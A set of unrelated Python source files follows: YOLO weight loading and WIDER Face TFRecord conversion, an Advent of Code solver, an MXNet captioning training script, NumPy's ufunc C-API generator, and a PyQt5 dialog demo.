batch_norm = sub_model.layers[i + 1]
logging.info("{}/{} {}".format(
sub_model.name, layer.name, 'bn' if batch_norm else 'bias'))
filters = layer.filters
size = layer.kernel_size[0]
in_dim = layer.get_input_shape_at(0)[-1]
if batch_norm is None:
conv_bias = np.fromfile(wf, dtype=np.float32, count=filters)
else:
# darknet [beta, gamma, mean, variance]
bn_weights = np.fromfile(
wf, dtype=np.float32, count=4 * filters)
# tf [gamma, beta, mean, variance]
bn_weights = bn_weights.reshape((4, filters))[[1, 0, 2, 3]]
# darknet shape (out_dim, in_dim, height, width)
conv_shape = (filters, in_dim, size, size)
conv_weights = np.fromfile(
wf, dtype=np.float32, count=np.product(conv_shape))
# tf shape (height, width, in_dim, out_dim)
conv_weights = conv_weights.reshape(
conv_shape).transpose([2, 3, 1, 0])
if batch_norm is None:
layer.set_weights([conv_weights, conv_bias])
else:
layer.set_weights([conv_weights])
batch_norm.set_weights(bn_weights)
assert len(wf.read()) == 0, 'failed to read all data'
wf.close()
def broadcast_iou(box_1, box_2):
# box_1: (..., (x1, y1, x2, y2))
# box_2: (N, (x1, y1, x2, y2))
# broadcast boxes
box_1 = tf.expand_dims(box_1, -2)
box_2 = tf.expand_dims(box_2, 0)
# new_shape: (..., N, (x1, y1, x2, y2))
new_shape = tf.broadcast_dynamic_shape(tf.shape(box_1), tf.shape(box_2))
box_1 = tf.broadcast_to(box_1, new_shape)
box_2 = tf.broadcast_to(box_2, new_shape)
int_w = tf.maximum(tf.minimum(box_1[..., 2], box_2[..., 2]) -
tf.maximum(box_1[..., 0], box_2[..., 0]), 0)
int_h = tf.maximum(tf.minimum(box_1[..., 3], box_2[..., 3]) -
tf.maximum(box_1[..., 1], box_2[..., 1]), 0)
int_area = int_w * int_h
box_1_area = (box_1[..., 2] - box_1[..., 0]) * \
(box_1[..., 3] - box_1[..., 1])
box_2_area = (box_2[..., 2] - box_2[..., 0]) * \
(box_2[..., 3] - box_2[..., 1])
return int_area / (box_1_area + box_2_area - int_area)
def draw_outputs(img, outputs, class_names):
boxes, objectness, classes, nums = outputs
boxes, objectness, classes, nums = boxes[0], objectness[0], classes[0], nums[0]
wh = np.flip(img.shape[0:2])
cropped_image = []
for i in range(nums):
x1y1 = tuple((np.array(boxes[i][0:2]) * wh).astype(np.int32))
x2y2 = tuple((np.array(boxes[i][2:4]) * wh).astype(np.int32))
cropped_image.append(img[x1y1[1]:x2y2[1],x1y1[0]:x2y2[0],:].copy())
img = cv2.rectangle(img, x1y1, x2y2, (255, 0, 0), 2)
img = cv2.putText(img, '{} {:.4f}'.format(
class_names[int(classes[i])], objectness[i]),
x1y1, cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
return img,cropped_image
def draw_labels(x, y, class_names):
img = x.numpy()
boxes, classes = tf.split(y, (4, 1), axis=-1)
classes = classes[..., 0]
wh = np.flip(img.shape[0:2])
for i in range(len(boxes)):
x1y1 = tuple((np.array(boxes[i][0:2]) * wh).astype(np.int32))
x2y2 = tuple((np.array(boxes[i][2:4]) * wh).astype(np.int32))
img = cv2.rectangle(img, x1y1, x2y2, (255, 0, 0), 2)
img = cv2.putText(img, class_names[classes[i]],
x1y1, cv2.FONT_HERSHEY_COMPLEX_SMALL,
1, (0, 0, 255), 2)
return img
def freeze_all(model, frozen=True):
model.trainable = not frozen
if isinstance(model, tf.keras.Model):
for l in model.layers:
freeze_all(l, frozen)
def main(batch_size=1, split='test'):
dataset = tfds.load(
name='wider_face',
split=split,
data_dir=os.path.join('..', 'data', 'wider_face'),
shuffle_files=True,
download=True)
ds_numpy = tfds.as_numpy(dataset)
writer = tf.io.TFRecordWriter('../data/tfrecord/test')
path = os.path.join('../data/wider_face/downloads/extracted/ZIP.ucexport_download_id_0B6eKvaijfFUDbW4tdGpaYjgzOwMT4R6ikuxYiUtHrEwFA7Iw4SVAMwhF1wp3mCQfiNM/WIDER_test/images')
for ex in ds_numpy:
tf_ex = create_tfrecord(ex,path)
writer.write(tf_ex.SerializeToString())
writer.close()
print('successfully created in ../data/tfrecord')
def _bytes_list_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _float_list_feature(value):
return tf.train.Feature(bytes_list=tf.train.FloatList(value=[value]))
def create_tfrecord(ex,path):
with tf.io.gfile.GFile(os.path.join(path, '{}'.format(ex['image/filename'].decode('utf-8'))), 'rb') as fid:
encoded_jpg = fid.read()
xmins = []
xmaxs = []
ymins = []
ymaxs = []
classes_text = []
for face in ex['faces']['bbox']:
xmins.append(face[0])
xmaxs.append(face[2])
ymins.append(face[1])
ymaxs.append(face[3])
classes_text.append('face'.encode('utf-8'))
tf_ex = tf.train.Example(features=tf.train.Features(feature={
'image/encoded': dataset_util.bytes_feature(encoded_jpg),
'image/object/bbox/xmin': dataset_util.float_list_feature(xmins),
'image/object/bbox/xmax': dataset_util.float_list_feature(xmaxs),
'image/object/bbox/ymin': dataset_util.float_list_feature(ymins),
'image/object/bbox/ymax': dataset_util.float_list_feature(ymaxs),
'image/object/class/text': dataset_util.bytes_list_feature(classes_text)
}))
return tf_ex
if __name__=='__main__':
app.run(main)
|
the-stack_106_14753
|
from util import read_puzzle_input
def _parse_input(puzzle_input):
return [int(line) for line in puzzle_input.split("\n") if line != ""]
def has_pair_that_sums(number, preamble):
for i in range(len(preamble) - 1):
for j in range(i + 1, len(preamble)):
if preamble[i] + preamble[j] == number:
return True
return False
def first_invalid_number(puzzle_input, preamble_size=25):
encrypted_data = _parse_input(puzzle_input)
for i in range(preamble_size, len(encrypted_data) - preamble_size):
test_number = encrypted_data[i + preamble_size]
preamble = encrypted_data[i : i + preamble_size]
if not has_pair_that_sums(number=test_number, preamble=preamble):
return test_number
return None
def encryption_weakness(puzzle_input, preamble_size=25):
invalid_number = first_invalid_number(puzzle_input, preamble_size=preamble_size)
encrypted_data = _parse_input(puzzle_input)
for i in range(len(encrypted_data) - 1):
for j in range(i + 1, len(encrypted_data)):
contiguous_set = encrypted_data[i : j + 1]
if sum(contiguous_set) == invalid_number:
return max(contiguous_set) + min(contiguous_set)
elif sum(contiguous_set) > invalid_number:
break
return None
if __name__ == "__main__":
puzzle_input = read_puzzle_input()
print(f"Part 1: {first_invalid_number(puzzle_input)}")
print(f"Part 2: {encryption_weakness(puzzle_input)}")
|
the-stack_106_14756
|
"""
Google Neural Machine Translation
=================================
@article{wu2016google,
title={Google's neural machine translation system:
Bridging the gap between human and machine translation},
author={Wu, Yonghui and Schuster, Mike and Chen, Zhifeng and Le, Quoc V and
Norouzi, Mohammad and Macherey, Wolfgang and Krikun, Maxim and Cao, Yuan and Gao, Qin and
Macherey, Klaus and others},
journal={arXiv preprint arXiv:1609.08144},
year={2016}
}
"""
from absl import app, flags
from absl.flags import FLAGS
import time
import random
import os
import io
import sys
from tensorboardX import SummaryWriter
import logging
import numpy as np
import mxnet as mx
from mxnet import gluon
import gluonnlp as nlp
from gluonnlp.model.translation import NMTModel
from gluonnlp.loss import MaskedSoftmaxCELoss
from models.captioning.gnmt import get_gnmt_encoder_decoder
from utils.translation import BeamSearchTranslator
from metrics.bleu import compute_bleu
from utils.captioning import get_dataloaders, write_sentences, get_comp_str
from dataset import TennisSet
from models.vision.definitions import FrameModel
from utils.layers import TimeDistributed
from gluoncv.model_zoo import get_model
from mxnet.gluon.data.vision import transforms
from nlgeval import NLGEval
np.random.seed(100)
random.seed(100)
mx.random.seed(10000)
flags.DEFINE_string('model_id', '0000',
'model identification string')
flags.DEFINE_integer('epochs', 40,
'How many training epochs to complete')
flags.DEFINE_integer('num_hidden', 128,
'Dimension of the states')
flags.DEFINE_integer('emb_size', 100,
'Dimension of the embedding vectors')
flags.DEFINE_float('dropout', 0.2,
'dropout applied to layers (0 = no dropout)')
flags.DEFINE_integer('num_layers', 2,
'Number of layers in the encoder and decoder')
flags.DEFINE_integer('num_bi_layers', 1,
'Number of bidirectional layers in the encoder and decoder')
flags.DEFINE_string('cell_type', 'gru',
'gru or lstm')
flags.DEFINE_integer('batch_size', 128,
'Batch size for detection: higher faster, but more memory intensive.')
flags.DEFINE_integer('beam_size', 4,
'Beam size.')
flags.DEFINE_float('lp_alpha', 1.0,
'Alpha used in calculating the length penalty')
flags.DEFINE_integer('lp_k', 5,
'K used in calculating the length penalty')
flags.DEFINE_integer('test_batch_size', 32,
'Test batch size')
flags.DEFINE_integer('num_buckets', 5,
'Bucket number')
flags.DEFINE_string('bucket_scheme', 'constant',
'Strategy for generating bucket keys. It supports: '
'"constant": all the buckets have the same width; '
'"linear": the width of bucket increases linearly; '
'"exp": the width of bucket increases exponentially')
flags.DEFINE_float('bucket_ratio', 0.0,
'Ratio for increasing the throughput of the bucketing')
flags.DEFINE_integer('tgt_max_len', 50,
'Maximum length of the target sentence')
flags.DEFINE_string('optimizer', 'adam',
'optimization algorithm')
flags.DEFINE_float('lr', 1E-3,
'Initial learning rate')
flags.DEFINE_float('lr_update_factor', 0.5,
'Learning rate decay factor')
flags.DEFINE_float('clip', 5.0,
'gradient clipping')
flags.DEFINE_integer('log_interval', 100,
'Logging mini-batch interval.')
flags.DEFINE_integer('num_gpus', 1,
'Number of GPUs to use')
flags.DEFINE_string('backbone', 'DenseNet121',
'Backbone CNN name')
flags.DEFINE_string('backbone_from_id', None,
'Load a backbone model from a model_id, used for Temporal Pooling with fine-tuned CNN')
flags.DEFINE_bool('freeze_backbone', False,
'Freeze the backbone model')
flags.DEFINE_integer('data_shape', 512,
'The width and height for the input image to be cropped to.')
flags.DEFINE_integer('every', 1,
'Use only every this many frames: [train, val, test] splits')
flags.DEFINE_string('feats_model', None,
'load CNN features as npy files from this model')
flags.DEFINE_string('emb_file', 'embeddings-ex.txt',
'the word embedding file generated by train_embeddings.py')
def main(_argv):
os.makedirs(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id), exist_ok=True)
if FLAGS.num_gpus > 0: # only supports 1 GPU
ctx = mx.gpu()
else:
ctx = mx.cpu()
# Set up logging
logging.basicConfig()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
log_file_path = os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'log.txt')
log_dir = os.path.dirname(log_file_path)
if log_dir and not os.path.exists(log_dir):
os.makedirs(log_dir)
fh = logging.FileHandler(log_file_path)
logger.addHandler(fh)
key_flags = FLAGS.get_key_flags_for_module(sys.argv[0])
logging.info('\n'.join(f.serialize() for f in key_flags))
# set up tensorboard summary writer
tb_sw = SummaryWriter(log_dir=os.path.join(log_dir, 'tb'), comment=FLAGS.model_id)
# are we using features or do we include the CNN?
if FLAGS.feats_model is None:
backbone_net = get_model(FLAGS.backbone, pretrained=True, ctx=ctx).features
cnn_model = FrameModel(backbone_net, 11) # hardcoded the number of classes
if FLAGS.backbone_from_id:
if os.path.exists(os.path.join('models', 'vision', 'experiments', FLAGS.backbone_from_id)):
files = os.listdir(os.path.join('models', 'vision', 'experiments', FLAGS.backbone_from_id))
files = [f for f in files if f[-7:] == '.params']
if len(files) > 0:
files = sorted(files, reverse=True) # put latest model first
model_name = files[0]
cnn_model.load_parameters(os.path.join('models', 'vision', 'experiments', FLAGS.backbone_from_id, model_name), ctx=ctx)
logging.info('Loaded backbone params: {}'.format(os.path.join('models', 'vision', 'experiments', FLAGS.backbone_from_id, model_name)))
else:
raise FileNotFoundError('{}'.format(os.path.join('models', 'vision', 'experiments', FLAGS.backbone_from_id)))
if FLAGS.freeze_backbone:
for param in cnn_model.collect_params().values():
param.grad_req = 'null'
cnn_model = TimeDistributed(cnn_model.backbone)
src_embed = cnn_model
transform_train = transforms.Compose([
transforms.RandomResizedCrop(FLAGS.data_shape),
transforms.RandomFlipLeftRight(),
transforms.RandomColorJitter(brightness=0.4, contrast=0.4, saturation=0.4),
transforms.RandomLighting(0.1),
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
])
transform_test = transforms.Compose([
transforms.Resize(FLAGS.data_shape + 32),
transforms.CenterCrop(FLAGS.data_shape),
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
])
else:
from mxnet.gluon import nn # need to do this to force no use of Embedding on src
src_embed = nn.HybridSequential(prefix='src_embed_')
with src_embed.name_scope():
src_embed.add(nn.Dropout(rate=0.0))
transform_train = None
transform_test = None
# setup the data
data_train = TennisSet(split='train', transform=transform_train, captions=True, max_cap_len=FLAGS.tgt_max_len,
every=FLAGS.every, feats_model=FLAGS.feats_model)
data_val = TennisSet(split='val', transform=transform_test, captions=True, vocab=data_train.vocab,
every=FLAGS.every, inference=True, feats_model=FLAGS.feats_model)
data_test = TennisSet(split='test', transform=transform_test, captions=True, vocab=data_train.vocab,
every=FLAGS.every, inference=True, feats_model=FLAGS.feats_model)
val_tgt_sentences = data_val.get_captions(split=True)
test_tgt_sentences = data_test.get_captions(split=True)
write_sentences(val_tgt_sentences, os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'val_gt.txt'))
write_sentences(test_tgt_sentences, os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'test_gt.txt'))
# load embeddings for tgt_embed
if FLAGS.emb_file:
word_embs = nlp.embedding.TokenEmbedding.from_file(file_path=os.path.join('data', FLAGS.emb_file))
data_train.vocab.set_embedding(word_embs)
input_dim, output_dim = data_train.vocab.embedding.idx_to_vec.shape
tgt_embed = gluon.nn.Embedding(input_dim, output_dim)
tgt_embed.initialize(ctx=ctx)
tgt_embed.weight.set_data(data_train.vocab.embedding.idx_to_vec)
else:
tgt_embed = None
# setup the model
encoder, decoder = get_gnmt_encoder_decoder(cell_type=FLAGS.cell_type,
hidden_size=FLAGS.num_hidden,
dropout=FLAGS.dropout,
num_layers=FLAGS.num_layers,
num_bi_layers=FLAGS.num_bi_layers)
model = NMTModel(src_vocab=None, tgt_vocab=data_train.vocab, encoder=encoder, decoder=decoder,
embed_size=FLAGS.emb_size, prefix='gnmt_', src_embed=src_embed, tgt_embed=tgt_embed)
model.initialize(init=mx.init.Uniform(0.1), ctx=ctx)
static_alloc = True
model.hybridize(static_alloc=static_alloc)
logging.info(model)
start_epoch = 0
if os.path.exists(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id)):
files = os.listdir(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id))
files = [f for f in files if f[-7:] == '.params']
if len(files) > 0:
files = sorted(files, reverse=True) # put latest model first
model_name = files[0]
if model_name == 'valid_best.params':
model_name = files[1]
start_epoch = int(model_name.split('.')[0]) + 1
model.load_parameters(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, model_name), ctx=ctx)
logging.info('Loaded model params: {}'.format(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, model_name)))
# setup the beam search
translator = BeamSearchTranslator(model=model, beam_size=FLAGS.beam_size,
scorer=nlp.model.BeamSearchScorer(alpha=FLAGS.lp_alpha, K=FLAGS.lp_k),
max_length=FLAGS.tgt_max_len + 100)
logging.info('Use beam_size={}, alpha={}, K={}'.format(FLAGS.beam_size, FLAGS.lp_alpha, FLAGS.lp_k))
# setup the loss function
loss_function = MaskedSoftmaxCELoss()
loss_function.hybridize(static_alloc=static_alloc)
# run the training
train(data_train, data_val, data_test, model, loss_function, val_tgt_sentences, test_tgt_sentences,
translator, start_epoch, ctx, tb_sw)
def evaluate(data_loader, model, loss_function, translator, data_train, ctx):
"""Evaluate
"""
translation_out = []
all_inst_ids = []
avg_loss_denom = 0
avg_loss = 0.0
for batch_id, (src_seq, tgt_seq, src_valid_length, tgt_valid_length, inst_ids) in enumerate(data_loader):
# Put on ctxs
src_seq = src_seq.as_in_context(ctx)
tgt_seq = tgt_seq.as_in_context(ctx)
src_valid_length = src_valid_length.as_in_context(ctx)
tgt_valid_length = tgt_valid_length.as_in_context(ctx)
# Calculating Loss
out, _ = model(src_seq, tgt_seq[:, :-1], src_valid_length, tgt_valid_length - 1)
loss = loss_function(out, tgt_seq[:, 1:], tgt_valid_length - 1).mean().asscalar()
all_inst_ids.extend(inst_ids.asnumpy().astype(np.int32).tolist())
avg_loss += loss * (tgt_seq.shape[1] - 1)
avg_loss_denom += (tgt_seq.shape[1] - 1)
# Translate
samples, _, sample_valid_length =\
translator.translate(src_seq=src_seq, src_valid_length=src_valid_length)
max_score_sample = samples[:, 0, :].asnumpy()
sample_valid_length = sample_valid_length[:, 0].asnumpy()
for i in range(max_score_sample.shape[0]):
translation_out.append(
[data_train.vocab.idx_to_token[ele] for ele in
max_score_sample[i][1:(sample_valid_length[i] - 1)]])
avg_loss = avg_loss / avg_loss_denom
real_translation_out = [None for _ in range(len(all_inst_ids))]
for ind, sentence in zip(all_inst_ids, translation_out):
real_translation_out[ind] = sentence
return avg_loss, real_translation_out
def train(data_train, data_val, data_test, model, loss_function, val_tgt_sentences, test_tgt_sentences,
translator, start_epoch, ctx, tb_sw=None):
"""Training function.
"""
trainer = gluon.Trainer(model.collect_params(), FLAGS.optimizer, {'learning_rate': FLAGS.lr})
train_data_loader, val_data_loader, test_data_loader = get_dataloaders(data_train, data_val, data_test)
best_valid_bleu = 0.0
for epoch_id in range(start_epoch, FLAGS.epochs):
log_avg_loss = 0
log_wc = 0
log_start_time = time.time()
for batch_id, (src_seq, tgt_seq, src_valid_length, tgt_valid_length) in enumerate(train_data_loader):
# if batch_id == len(train_data_loader)-1:
# break # errors on last batch, jump out for now
# put on the right ctx
src_seq = src_seq.as_in_context(ctx)
tgt_seq = tgt_seq.as_in_context(ctx)
src_valid_length = src_valid_length.as_in_context(ctx)
tgt_valid_length = tgt_valid_length.as_in_context(ctx)
# calc the outs, the loss and back pass
with mx.autograd.record():
out, _ = model(src_seq, tgt_seq[:, :-1], src_valid_length, tgt_valid_length - 1)
loss = loss_function(out, tgt_seq[:, 1:], tgt_valid_length - 1).mean()
loss = loss * (tgt_seq.shape[1] - 1) / (tgt_valid_length - 1).mean()
loss.backward()
# step the trainer and add up some losses
trainer.step(1)
src_wc = src_valid_length.sum().asscalar()
tgt_wc = (tgt_valid_length - 1).sum().asscalar()
step_loss = loss.asscalar()
log_avg_loss += step_loss
log_wc += src_wc + tgt_wc
# log this batches statistics
if tb_sw:
tb_sw.add_scalar(tag='Training_loss',
scalar_value=step_loss,
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
tb_sw.add_scalar(tag='Training_ppl',
scalar_value=np.exp(step_loss),
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
if (batch_id + 1) % FLAGS.log_interval == 0:
wps = log_wc / (time.time() - log_start_time)
logging.info('[Epoch {} Batch {}/{}] loss={:.4f}, ppl={:.4f} throughput={:.2f}K wps, wc={:.2f}K'
.format(epoch_id, batch_id + 1, len(train_data_loader),
log_avg_loss / FLAGS.log_interval,
np.exp(log_avg_loss / FLAGS.log_interval),
wps / 1000, log_wc / 1000))
log_start_time = time.time()
log_avg_loss = 0
log_wc = 0
# log embeddings
if tb_sw:
embs = mx.nd.array(list(range(len(data_train.vocab)))).as_in_context(ctx)
embs = model.tgt_embed(embs)
labs = data_train.vocab.idx_to_token
tb_sw.add_embedding(mat=embs.asnumpy(), metadata=labs,
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
# calculate validation and loss stats at end of epoch
valid_loss, valid_translation_out = evaluate(val_data_loader, model, loss_function, translator, data_train, ctx)
valid_bleu_score, _, _, _, _ = compute_bleu([val_tgt_sentences], valid_translation_out)
# valid_met_score = meteor_score([[' '.join(sent)] for sent in val_tgt_sentences], [' '.join(sent) for sent in valid_translation_out])
str_ = '[Epoch {}] valid Loss={:.4f}, valid ppl={:.4f}, valid bleu={:.2f}'.format(
epoch_id, valid_loss, np.exp(valid_loss), valid_bleu_score * 100)
nlgeval = NLGEval()
metrics_dict = nlgeval.compute_metrics([[' '.join(sent) for sent in val_tgt_sentences]],
[' '.join(sent) for sent in valid_translation_out])
for k, v in metrics_dict.items():
str_ += ', valid '+k+'={:.4f}'.format(float(v))
logging.info(str_)
# log the validation and loss stats
if tb_sw:
tb_sw.add_scalar(tag='Validation_loss',
scalar_value=valid_loss,
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
tb_sw.add_scalar(tag='Validation_ppl',
scalar_value=np.exp(valid_loss),
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
tb_sw.add_scalar(tag='Validation_bleu',
scalar_value=valid_bleu_score * 100,
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
tb_sw.add_text(tag='Validation Caps',
text_string=get_comp_str(val_tgt_sentences, valid_translation_out),
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
for k, v in metrics_dict.items():
tb_sw.add_scalar(tag='Validation_'+k,
scalar_value=float(v),
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
# also calculate the test stats
test_loss, test_translation_out = evaluate(test_data_loader, model, loss_function, translator, data_train, ctx)
test_bleu_score, _, _, _, _ = compute_bleu([test_tgt_sentences], test_translation_out)
# test_met_score = meteor_score([test_tgt_sentences], test_translation_out)
str_ = '[Epoch {}] test Loss={:.4f}, test ppl={:.4f}, test bleu={:.2f}'.format(
epoch_id, test_loss, np.exp(test_loss), test_bleu_score * 100)
nlgeval = NLGEval()
metrics_dict = nlgeval.compute_metrics([[' '.join(sent) for sent in test_tgt_sentences]],
[' '.join(sent) for sent in test_translation_out])
for k, v in metrics_dict.items():
str_ += ', test '+k+'={:.4f}'.format(float(v))
logging.info(str_)
# and log the test stats
if tb_sw:
tb_sw.add_scalar(tag='Test_loss',
scalar_value=test_loss,
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
tb_sw.add_scalar(tag='Test_ppl',
scalar_value=np.exp(test_loss),
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
tb_sw.add_scalar(tag='Test_bleu',
scalar_value=test_bleu_score * 100,
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
tb_sw.add_text(tag='Test Caps',
text_string=get_comp_str(test_tgt_sentences, test_translation_out),
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
for k, v in metrics_dict.items():
tb_sw.add_scalar(tag='Test_'+k,
scalar_value=float(v),
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
# write out the validation and test sentences to files
write_sentences(valid_translation_out, os.path.join('models', 'captioning', FLAGS.model_id,
'epoch{:d}_valid_out.txt').format(epoch_id))
write_sentences(test_translation_out, os.path.join('models', 'captioning', FLAGS.model_id,
'epoch{:d}_test_out.txt').format(epoch_id))
# save the model params if best
if valid_bleu_score > best_valid_bleu:
best_valid_bleu = valid_bleu_score
save_path = os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'valid_best.params')
logging.info('Save best parameters to {}'.format(save_path))
model.save_parameters(save_path)
if epoch_id + 1 >= (FLAGS.epochs * 2) // 3:
new_lr = trainer.learning_rate * FLAGS.lr_update_factor
logging.info('Learning rate change to {}'.format(new_lr))
trainer.set_learning_rate(new_lr)
model.save_parameters(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, "{:04d}.params".format(epoch_id)))
# load and evaluate the best model
if os.path.exists(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'valid_best.params')):
model.load_parameters(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'valid_best.params'))
valid_loss, valid_translation_out = evaluate(val_data_loader, model, loss_function, translator, data_train, ctx)
valid_bleu_score, _, _, _, _ = compute_bleu([val_tgt_sentences], valid_translation_out)
str_ = 'Best model valid Loss={:.4f}, valid ppl={:.4f}, valid bleu={:.2f}'.format(
epoch_id, valid_loss, np.exp(valid_loss), valid_bleu_score * 100)
nlgeval = NLGEval()
metrics_dict = nlgeval.compute_metrics([[' '.join(sent) for sent in val_tgt_sentences]],
[' '.join(sent) for sent in valid_translation_out])
for k, v in metrics_dict.items():
str_ += ', valid ' + k + '={:.4f}'.format(float(v))
logging.info(str_)
test_loss, test_translation_out = evaluate(test_data_loader, model, loss_function, translator, data_train, ctx)
test_bleu_score, _, _, _, _ = compute_bleu([test_tgt_sentences], test_translation_out)
str_ = 'Best model test Loss={:.4f}, test ppl={:.4f}, test bleu={:.2f}'.format(
epoch_id, test_loss, np.exp(test_loss), test_bleu_score * 100)
nlgeval = NLGEval()
metrics_dict = nlgeval.compute_metrics([[' '.join(sent) for sent in test_tgt_sentences]],
[' '.join(sent) for sent in test_translation_out])
for k, v in metrics_dict.items():
str_ += ', test ' + k + '={:.4f}'.format(float(v))
logging.info(str_)
write_sentences(valid_translation_out, os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'best_valid_out.txt'))
write_sentences(test_translation_out, os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'best_test_out.txt'))
if __name__ == '__main__':
try:
app.run(main)
except SystemExit:
pass
|
the-stack_106_14757
|
import os
import genapi
import numpy_api
from genapi import TypeApi, FunctionApi
h_template = r"""
#ifdef _UMATHMODULE
extern NPY_NO_EXPORT PyTypeObject PyUFunc_Type;
%s
#else
#if defined(PY_UFUNC_UNIQUE_SYMBOL)
#define PyUFunc_API PY_UFUNC_UNIQUE_SYMBOL
#endif
#if defined(NO_IMPORT) || defined(NO_IMPORT_UFUNC)
extern void **PyUFunc_API;
#else
#if defined(PY_UFUNC_UNIQUE_SYMBOL)
void **PyUFunc_API;
#else
static void **PyUFunc_API=NULL;
#endif
#endif
%s
static NPY_INLINE int
_import_umath(void)
{
PyObject *numpy = PyImport_ImportModule("numpy.core._multiarray_umath");
PyObject *c_api = NULL;
if (numpy == NULL) {
PyErr_SetString(PyExc_ImportError,
"numpy.core._multiarray_umath failed to import");
return -1;
}
c_api = PyObject_GetAttrString(numpy, "_UFUNC_API");
Py_DECREF(numpy);
if (c_api == NULL) {
PyErr_SetString(PyExc_AttributeError, "_UFUNC_API not found");
return -1;
}
if (!PyCapsule_CheckExact(c_api)) {
PyErr_SetString(PyExc_RuntimeError, "_UFUNC_API is not PyCapsule object");
Py_DECREF(c_api);
return -1;
}
PyUFunc_API = (void **)PyCapsule_GetPointer(c_api, NULL);
Py_DECREF(c_api);
if (PyUFunc_API == NULL) {
PyErr_SetString(PyExc_RuntimeError, "_UFUNC_API is NULL pointer");
return -1;
}
return 0;
}
#define import_umath() \
do {\
UFUNC_NOFPE\
if (_import_umath() < 0) {\
PyErr_Print();\
PyErr_SetString(PyExc_ImportError,\
"numpy.core.umath failed to import");\
return NULL;\
}\
} while(0)
#define import_umath1(ret) \
do {\
UFUNC_NOFPE\
if (_import_umath() < 0) {\
PyErr_Print();\
PyErr_SetString(PyExc_ImportError,\
"numpy.core.umath failed to import");\
return ret;\
}\
} while(0)
#define import_umath2(ret, msg) \
do {\
UFUNC_NOFPE\
if (_import_umath() < 0) {\
PyErr_Print();\
PyErr_SetString(PyExc_ImportError, msg);\
return ret;\
}\
} while(0)
#define import_ufunc() \
do {\
UFUNC_NOFPE\
if (_import_umath() < 0) {\
PyErr_Print();\
PyErr_SetString(PyExc_ImportError,\
"numpy.core.umath failed to import");\
}\
} while(0)
#endif
"""
c_template = r"""
/* These pointers will be stored in the C-object for use in other
extension modules
*/
void *PyUFunc_API[] = {
%s
};
"""
def generate_api(output_dir, force=False):
basename = 'ufunc_api'
h_file = os.path.join(output_dir, '__%s.h' % basename)
c_file = os.path.join(output_dir, '__%s.c' % basename)
d_file = os.path.join(output_dir, '%s.txt' % basename)
targets = (h_file, c_file, d_file)
sources = ['ufunc_api_order.txt']
if (not force and not genapi.should_rebuild(targets, sources + [__file__])):
return targets
else:
do_generate_api(targets, sources)
return targets
def do_generate_api(targets, sources):
header_file = targets[0]
c_file = targets[1]
doc_file = targets[2]
ufunc_api_index = genapi.merge_api_dicts((
numpy_api.ufunc_funcs_api,
numpy_api.ufunc_types_api))
genapi.check_api_dict(ufunc_api_index)
ufunc_api_list = genapi.get_api_functions('UFUNC_API', numpy_api.ufunc_funcs_api)
# Create dict name -> *Api instance
ufunc_api_dict = {}
api_name = 'PyUFunc_API'
for f in ufunc_api_list:
name = f.name
index = ufunc_api_index[name][0]
annotations = ufunc_api_index[name][1:]
ufunc_api_dict[name] = FunctionApi(f.name, index, annotations,
f.return_type, f.args, api_name)
for name, val in numpy_api.ufunc_types_api.items():
index = val[0]
ufunc_api_dict[name] = TypeApi(name, index, 'PyTypeObject', api_name)
# set up object API
module_list = []
extension_list = []
init_list = []
for name, index in genapi.order_dict(ufunc_api_index):
api_item = ufunc_api_dict[name]
extension_list.append(api_item.define_from_array_api_string())
init_list.append(api_item.array_api_define())
module_list.append(api_item.internal_define())
# Write to header
s = h_template % ('\n'.join(module_list), '\n'.join(extension_list))
genapi.write_file(header_file, s)
# Write to c-code
s = c_template % ',\n'.join(init_list)
genapi.write_file(c_file, s)
# Write to documentation
s = '''
=================
NumPy Ufunc C-API
=================
'''
for func in ufunc_api_list:
s += func.to_ReST()
s += '\n\n'
genapi.write_file(doc_file, s)
return targets
|
the-stack_106_14758
|
#!/usr/local/bin/python3
# -*- coding: utf-8 -*-
import sys
from PyQt5.QtWidgets import QWidget, QMainWindow, QApplication, QPushButton, QInputDialog, QLineEdit
class Example(QMainWindow):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
btn = QPushButton('Open Dialog', self)
btn.move(20, 20)
btn.clicked.connect(self.showDialog)
self.lineEdit = QLineEdit(self)
self.lineEdit.move(130, 22)
# status bar
self.statusBar().showMessage("Ready")
# position
self.setGeometry(300, 300, 250, 150)
# window title
self.setWindowTitle("Input Dialog")
# show window
self.show()
def showDialog(self):
text, ok = QInputDialog.getText(self, "Input Dialog", "Input your name:")
if ok:
self.lineEdit.setText(str(text))
if __name__ == "__main__":
app = QApplication(sys.argv)
ex = Example()
